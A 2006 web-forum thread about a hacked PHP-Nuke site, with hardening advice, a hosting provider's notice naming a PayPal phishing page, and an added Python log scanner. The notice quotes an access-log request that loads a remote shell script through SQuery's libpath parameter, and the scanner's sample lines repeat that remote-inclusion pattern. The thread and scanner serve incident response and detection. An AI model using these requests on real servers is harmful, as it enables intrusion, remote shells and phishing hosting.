swisschese
New Member
Joined: Jun 30, 2006
Posts: 21
Posted: Thu Sep 07, 2006 6:08 pm
Any tips?
[EDIT: image removed]
Anyone had this happen?
Thanks, I don't think that the forums are up to date.
fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY
Posted: Thu Sep 07, 2006 7:26 pm
There are many threads that you can consult here. Without further information there is little we can do. Nuke version? Forums version? Running Sentinel or not and what version? Have you looked in the logs? Any "third party" modules that let people upload?
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6437
Posted: Thu Sep 07, 2006 7:28 pm
Install NukeSentinel, and put admin authentication on your admin.php file and modules/Forums/admin directory (search the forums here for specific instructions).
Check for any changed files, check your database. Change your control panel and nuke database passwords, which should be different.
I'll remove the picture from your post - there's no need to display offensive materials.
_________________ I search, therefore I exist...
swisschese
Posted: Thu Sep 07, 2006 7:49 pm
Nuke : Raven's RavenNuke76 v2.02.02 Distro
Forums: phpBB 2.0.20. ( Not sure how to update )
Sentinel yes, NukeSentinel(tm) 2.4.2pl5
Logs, oh yeah, lots of IPs
Nothing to upload as I know of!
kguske
Posted: Thu Sep 07, 2006 7:52 pm
What about admin authentication on admin.php and modules/Forums/admin?
swisschese
Posted: Thu Sep 07, 2006 7:55 pm
I think it's broke...
My user login is gone... bleh
floppydrivez
Involved
Joined: Feb 26, 2006
Posts: 340
Location: Jackson, Mississippi
Posted: Thu Sep 07, 2006 8:05 pm
FireATST
RavenNuke(tm) Development Team
Joined: Jun 12, 2004
Posts: 654
Location: Ohio
Posted: Sat Sep 09, 2006 8:49 pm
Upgrade your Sentinel to the latest.... :)
swisschese
Posted: Mon Sep 11, 2006 10:58 pm
From: admin@1and1.com
To:
Subject: C54836102 - 1&1 Internet Compliance -- Account Warning - Hacked
Date: Mon, 11 Sep 2006 08:16:04 -0400
>Dear Swiss Chese,
>
>It has come to our attention that your web space has been hacked and
>used to host a phishing site at
>http://www.xtremeidiots.com/www.paypal.com.webscr.phpcmd=LogIn//:
>
>access.log.36.gz:86.126.57.95 - - [10/Sep/2006:10:29:41 -0400] "GET
>/SQuery/lib/armygame.php?libpath=http://www.freewebtown.com/k
>aizenngo5/hack/shell.php.txt? HTTP/1.1" 200 6255 www.xtremeidiots.com
>"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1
>; .NET CLR 1.1.4322)" "-"
>
>--
>
>The above was taken from your access logs. It shows that
>/SQuery/lib/armygame.php was used to perpetrate the hack.
>
>Please contact the developers for this script/application. You will
>likely need to install a version update and/or security patch to prevent
>further abuse.
>
>Also, reply to this email in acknowledgement of this issue. Failure to
>do so can result in your account being locked and possibly terminated.
>
>--
>Sincerely,
>Customer Compliance Operative
>1&1 Internet Inc.
I got hacked cause of a server viewer that I had.
Thank you for all the help... let this be a warning to all
SQUERY 4.0 game server viewer does have big security holes!!!
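
The kind of access-log review the hosting provider's notice above describes, as an added example that is not part of the original thread: it scans log entries for requests whose query parameters carry a remote URL, as the `libpath` parameter does in the quoted entry. The sample entries, hosts and addresses are constructed, and the function name is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache-style access-log entry; an optional "file:" prefix (as grep adds) is skipped.
LINE_RE = re.compile(
    r'^(?:\S+?:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a remote URL.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_remote_url_params(lines):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an IPv4 access-log entry; skip it
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so encoded URLs are caught as well.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            value = value.strip()
            if REMOTE_RE.match(value):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": target.path,
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                })
    return hits


# Constructed sample entries (documentation addresses and example hosts).
SAMPLE_LOG = [
    'access.log.1.gz:192.0.2.10 - - [10/Sep/2006:10:29:41 -0400] "GET /SQuery/lib/armygame.php?libpath=http://files.example.net/payload.txt? HTTP/1.1" 200 6255 www.example.com "-" "Mozilla/4.0" "-"',
    '198.51.100.7 - - [10/Sep/2006:10:30:02 -0400] "GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 18211 www.example.com "-" "Mozilla/4.0" "-"',
    '192.0.2.44 - - [10/Sep/2006:10:31:15 -0400] "GET /SQuery/lib/armygame.php?libpath=http%3A%2F%2Ffiles.example.net%2Fp.txt HTTP/1.1" 404 312 www.example.com "-" "-" "-"',
]

if __name__ == "__main__":
    for hit in find_remote_url_params(SAMPLE_LOG):
        # A 200 status means the script answered the request and needs a closer look.
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]} '
              f'{hit["param"]}={hit["value"]} status={hit["status"]}')
```

Legitimate redirect or link parameters will also match, so triage hits by script path and response status.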
swisschese
Posted: Tue Sep 12, 2006 3:28 am
I know there is no way I can upload the 2 files that I found on my comp. but it looks like a method that they are using to crack the adminhttp.. if any admin would like to take a look at it please let me know and I will send the 2 php files over to them to help make this more secure.
Thanks
SwisS
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
Posted: Tue Sep 12, 2006 6:35 am
swisschese, they got in through SQuery. Once "in" at the server level, HTTPAuth will not help you...
I would suggest signing up for the Secunia Advisory service at http://secunia.com/. SQuery was addressed [link visible to registered users only]. An invaluable service for the webmaster. No guarantee they will cover every script, but just another resource.
Like I always say "your site is only as secure as its weakest link". It can be exhausting at times trying to keep up.